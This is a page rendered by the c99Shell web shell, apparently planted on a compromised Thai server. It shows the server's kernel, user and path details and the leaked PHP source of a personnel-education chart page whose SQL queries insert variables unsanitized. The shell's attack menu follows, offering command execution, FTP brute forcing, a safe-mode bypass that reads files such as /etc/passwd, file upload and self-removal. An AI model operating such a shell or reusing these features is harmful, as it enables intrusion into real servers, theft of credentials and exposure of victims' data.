!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/   drwxr-xr-x
Free 52.98 GB of 127.8 GB (41.45%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     GrapDegree.php (11.99 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

    
//session_start();
    
    /**  Define Validate Access  */
    
define'_VALID_ACCESS');

    
/**  Check Session User Login  */
    
        /**  Configuration  */
        
require_once( "configuration.php" );
        require_once( 
$_Config_absolute_path "/includes/framework.php" );
        require_once( 
"includes/Function.php" );
        
        
/**  Chart  */
        
include ("includes/charts.php");


        
/**  Create Database Object  */
        
$dbObj = new DBConn;
        
        
$myTable "personal_tb";        
        
        
        
//===  
        
$query " SELECT *  FROM $myTable   ";
        
$result $dbObj->execQuery($query);
        
$num $dbObj->_numrows;
        
//$total = $dbObj->_numrows;

 
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link href="css/default.css" rel="stylesheet" type="text/css" />
<script language="javascript" src="js/utilities.js"></script>
<script language="Javascript" src="charts/charts.js"></script>
<title>จำนวนระดับการศึกษาของบุคลากรทุกสายงานทั้งหมด</title>
</head>

<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">
<?php
    
include("templates/incHeader.php");
?>
<table width="1003" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="203" align="left" valign="top" style="padding:10px 0px 0px 5px"><?php include( "templates/incMainMenuLeft.php" );?></td>
    <td width="800" align="center" valign="top" style="padding:10px 0px 5px 10px"><fieldset><table width="780" border="0" cellspacing="0" cellpadding="0">
     <form id="myForm" name="myForm" method="post" action="<?=$PHP_SELF;?>?page=<?=$page;?>">
      <tr>
        <td height="5"></td>
      </tr>
      <tr>
        <td height="30" background="images/background/bg-head-topic-w780.gif" class="PADDING-LEFT-10"><strong><a href="index.php">หน้าหลัก</a></strong> <strong>&raquo; <span class="NOTE">แผนภูมิแสดงวุฒิการศึกษาของบุคลากรทุกสายงาน</span></strong></td>
        </tr>
      <tr>
        <td><table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
          <tr>
            <td height="26" class="PADDING-TOP-10"><img src="images/icons/arrow-circle-225-left.png" width="16" height="16" border="0" align="absmiddle" /> <a href="javascript:;" onclick="window.history.back();"><strong>&lsaquo; ย้อนกลับ</strong></a></td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td height="13" align="center" valign="top">
          <table width="75%" border="0" align="center" cellpadding="0" cellspacing="0">
            <tr>
              <td align="right" style="padding:5px 0px 5px 0px"></td></tr>
            </table>
          
          <table width="750" border="0" cellspacing="0" cellpadding="0">
            <tr>
              <td align="center">
                </td>
              </tr>
            </table>
          </td>
      </tr>
      <tr>
        <td align="center"> <?php
                      $nub
=1;
                    
$animateChart "1";
                    
                    
$strXML "<chart caption='จำนวนระดับการศึกษาของบุคลากรทุกสายงาน' subCaption='' pieSliceDepth='30' showBorder='1' formatNumberScale='0' numberSuffix='&permil; ' animation=' "  $animateChart " '>";
                
                 
$strQ " SELECT *  FROM  degree_tb";    
                 
$res $dbObj->execQuery($strQ);
                 
$c mysql_num_rows($res);
                
                   while( 
$rs0 $dbObj->fetchArray($res) ) {
                           
$dc $rs0['Degree_code'];
                           if (
$dc != ){    
                                        
                     
$sql " SELECT COUNT(Degree_code) AS num  FROM personal_tb  WHERE  StatusId='1'  AND  Degree_code='$dc'    and   (  Person_type='1'  Or  Person_type='2'   Or  Person_type='3'  Or  Person_type='4'  Or   Person_type='5') ";
                            
$result $dbObj->execQuery($sql);
                            
$rs $dbObj->fetchArray($result);
                            
                    
                    
$sql1 " SELECT COUNT(Teacher_code) AS num5  FROM personal_tb  WHERE  StatusId='1'    and (Degree_code='1'  Or  Degree_code='2'  Or Degree_code='3' )    and  (  Person_type='1'  Or  Person_type='2'   Or  Person_type='3'  Or  Person_type='4'  Or   Person_type='5') ";
                    
$result1 $dbObj->execQuery($sql1);
                    
$rs1 $dbObj->fetchArray($result1);
                    echo 
$num5 ;
                            
$per = ( $rs['num'] * 100 ) / $rs1['num5'];
                                 
$p number_format($per,2,'.','.');
                                 
$strXML .= "<set label='" $rs0['Degree_name'] . "' value='" .$p "' />";
                        }
                     }
                    
                    
//Finally, close <chart> element
                    
$strXML .= "</chart>";
                
                    
//Create the chart - Pie 3D Chart with data from strXML
                    
echo renderChart("charts/Column3D.swf"""$strXML"",550375falsefalse);
              
?></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td><table width="97%" border="0" align="left" cellpadding="1" cellspacing="1" bgcolor="#FFFFFF" style="background-color:#eeeeee; border:0px solid gray">
          <tr bgcolor="<?=$bgColor;?>">
            <td width="5%" height="22" align="center" bgcolor="#6699FF">No</td>
            <td width="48%" align="center" bgcolor="#6699FF" class="PADDING-LEFT-5">รายการ </td>
            <td width="11%" align="center" bgcolor="#6699FF" class="PADDING-LEFT-5">ปริญญาตรี</td>
            <td width="11%" align="center" bgcolor="#6699FF" class="PADDING-LEFT-5">ปริญญาโท</td>
            <td width="15%" align="center" bgcolor="#6699FF" class="PADDING-LEFT-5">ปริญญาเอก</td>
            <td width="10%" align="center" bgcolor="#6699FF" class="PADDING-LEFT-5">จำนวน</td>
          </tr>
          <?php
                $sql 
" SELECT * FROM  person_type_tb    " ;
                
$result19 $dbObj->execQuery($sql); 
               
$no 1+($display-1)*$limit;
           while( 
$rss13 $dbObj->fetchArray($result19) ) { 
                
$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" "#FFFFFF";
          
?>
          <tr bgcolor="<?=$bgColor;?>">
            <td height="22" align="center" bgcolor="#FFFFFF"><?=$no;?></td>
            <td align="left" bgcolor="#FFFFFF" class="PADDING-LEFT-5"><?=$rss13['Ptype_name'];?>
              </a></td>
            <td align="center" bgcolor="#FFFFFF" class="PADDING-LEFT-5"><?php   
                    $sql 
" SELECT COUNT(Teacher_type) AS num  FROM personal_tb  WHERE  StatusId='1'   and  Person_type='$rss13[Ptype_code]'  and Degree_code='1' ";
                    
$result11 $dbObj->execQuery($sql);
                    
$rs11 $dbObj->fetchArray($result11);
                    
$dbObj->freeresult($result11);
                        echo 
$rs11['num'];
                
?>
              </a><a href="PersonalDataType.php?StatusId=1&amp;Person_type=<?=$rss3['Ptype_code'];?>"></a></td>
            <td align="center" bgcolor="#FFFFFF" class="PADDING-LEFT-5"><?php   
                    $sql 
" SELECT COUNT(Teacher_type) AS num  FROM personal_tb  WHERE  StatusId='1'   and  Person_type='$rss13[Ptype_code]'  and Degree_code='2' ";
                    
$result12 $dbObj->execQuery($sql);
                    
$rs12 $dbObj->fetchArray($result12);
                    
$dbObj->freeresult($result12);
                        echo 
$rs12['num'];
                
?>
              </a><a href="PersonalDataType.php?StatusId=3&amp;Person_type=<?=$rss3['Ptype_code'];?>"></a></td>
            <td align="center" bgcolor="#FFFFFF" class="PADDING-LEFT-5"><?php   
                    $sql 
" SELECT COUNT(Teacher_type) AS num  FROM personal_tb  WHERE  StatusId='1'   and  Person_type='$rss13[Ptype_code]'  and Degree_code='3' ";
                    
$result13 $dbObj->execQuery($sql);
                    
$rs13 $dbObj->fetchArray($result13);
                        echo 
$rs13['num'];
                
?>
              </a></td>
            <td align="center" bgcolor="#FFFFFF" class="PADDING-LEFT-5"><?php   
                        $sum 
=  $rs11['num']+ $rs12['num']+  $rs13['num']; ;
                        echo 
$sum ;
                
?></td>
            <?php 
                $no
++ ;
                     } 
# while 
                
?>
          </tr>
          <tr bgcolor="<?=$bgColor;?>">
            <td height="22" align="center" bgcolor="#FFCCFF">&nbsp;</td>
            <td align="center" bgcolor="#FFCCFF" class="PADDING-LEFT-5">สรุป</td>
            <td align="center" bgcolor="#FFCCFF" class="PADDING-LEFT-5"></a>
              <?php   
                    $sql 
" SELECT COUNT(Teacher_type) AS num5  FROM personal_tb  WHERE  StatusId='1'  and  Degree_code='1'  and  (  Person_type='1'  Or  Person_type='2'   Or  Person_type='3'  Or  Person_type='4'  Or   Person_type='5') ";
                    
$result1 $dbObj->execQuery($sql);
                    
$rs1 $dbObj->fetchArray($result1);
                    
$dbObj->freeresult($result7);
                        echo 
$rs1['num5'];
                
?></td>
            <td align="center" bgcolor="#FFCCFF" class="PADDING-LEFT-5"><?php   
                    $sql 
" SELECT COUNT(Teacher_type) AS num5  FROM personal_tb  WHERE   StatusId='1'  and  Degree_code='2'  and  (  Person_type='1'  Or  Person_type='2'   Or  Person_type='3'  Or  Person_type='4'  Or   Person_type='5') ";
                    
$result1 $dbObj->execQuery($sql);
                    
$rs1 $dbObj->fetchArray($result1);
                    
$dbObj->freeresult($result7);
                        echo 
$rs1['num5'];
                
?></td>
            <td align="center" bgcolor="#FFCCFF" class="PADDING-LEFT-5"><?php   
                    $sql 
" SELECT COUNT(Teacher_type) AS num5  FROM personal_tb  WHERE  StatusId='1'  and  Degree_code='3'   and  (  Person_type='1'  Or  Person_type='2'   Or  Person_type='3'  Or  Person_type='4'  Or   Person_type='5') ";
                    
$result1 $dbObj->execQuery($sql);
                    
$rs1 $dbObj->fetchArray($result1);
                    
$dbObj->freeresult($result7);
                        echo 
$rs1['num5'];
                
?></td>
            <td align="center" bgcolor="#FFCCFF" class="PADDING-LEFT-5"><?php   
                    $sql 
" SELECT COUNT(Teacher_type) AS num5  FROM personal_tb  WHERE  StatusId='1'   and (Degree_code='1'  Or  Degree_code='2'  Or Degree_code='3' )  and  (  Person_type='1'  Or  Person_type='2'   Or  Person_type='3'  Or  Person_type='4'  Or   Person_type='5') ";
                    
$result1 $dbObj->execQuery($sql);
                    
$rs1 $dbObj->fetchArray($result1);
                    
$dbObj->freeresult($result7);
                        echo 
$rs1['num5'];
                
?></td>
          </tr>
          <tr bgcolor="<?=$bgColor;?>">
            <td height="22" align="center" bgcolor="#FF99CC">&nbsp;</td>
            <td align="center" bgcolor="#FF99CC" class="PADDING-LEFT-5">อัตราส่วน</td>
            <td align="center" bgcolor="#FF99CC" class="PADDING-LEFT-5"><?php  
                    $sql 
" SELECT COUNT(Teacher_type) AS sum  FROM personal_tb  WHERE  StatusId='1'  and  Degree_code='1'  and  (  Person_type='1'  Or  Person_type='2'   Or  Person_type='3'  Or  Person_type='4'  Or   Person_type='5') ";
                    
$result2 $dbObj->execQuery($sql);
                    
$rs2 $dbObj->fetchArray($result2);
                    
                    
$per2= ( $rs2['sum'] * 100 ) / $rs1['num5'] ;
                        echo 
number_format($per2,2,'.','.');
                
?></td>
            <td align="center" bgcolor="#FF99CC" class="PADDING-LEFT-5"><?php  
                    $sql 
" SELECT COUNT(Teacher_type) AS sum  FROM personal_tb  WHERE  StatusId='1'  and  Degree_code='2'  and  (  Person_type='1'  Or  Person_type='2'   Or  Person_type='3'  Or  Person_type='4'  Or   Person_type='5') ";
                    
$result2 $dbObj->execQuery($sql);
                    
$rs2 $dbObj->fetchArray($result2);
                    
                    
$per2= ( $rs2['sum'] * 100 ) / $rs1['num5'] ;
                        echo 
number_format($per2,2,'.','.');
                
?></td>
            <td align="center" bgcolor="#FF99CC" class="PADDING-LEFT-5"><?php  
                    $sql 
" SELECT COUNT(Teacher_type) AS sum  FROM personal_tb  WHERE  StatusId='1'  and  Degree_code='3'  and  (  Person_type='1'  Or  Person_type='2'   Or  Person_type='3'  Or  Person_type='4'  Or   Person_type='5') ";
                    
$result2 $dbObj->execQuery($sql);
                    
$rs2 $dbObj->fetchArray($result2);
                    
                    
$per2= ( $rs2['sum'] * 100 ) / $rs1['num5'] ;
                        echo 
number_format($per2,2,'.','.');
                
?></td>
            <td align="center" bgcolor="#FF99CC" class="PADDING-LEFT-5">100%</td>
          </tr>
        </table></td>
      </tr></form>
     </table>
    </fieldset></td>
  </tr>
</table>
<?php include("templates/incFooter.php"); ?>
</body>
</html>
<?php
    
/**  Free Resource */
    
$dbObj->freeresult($result);
    
    
/**  Close the Database  */
    
$dbObj->disconn();
    
    
/**  Unset Class  */
    
unset($dbObj);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0075 ]--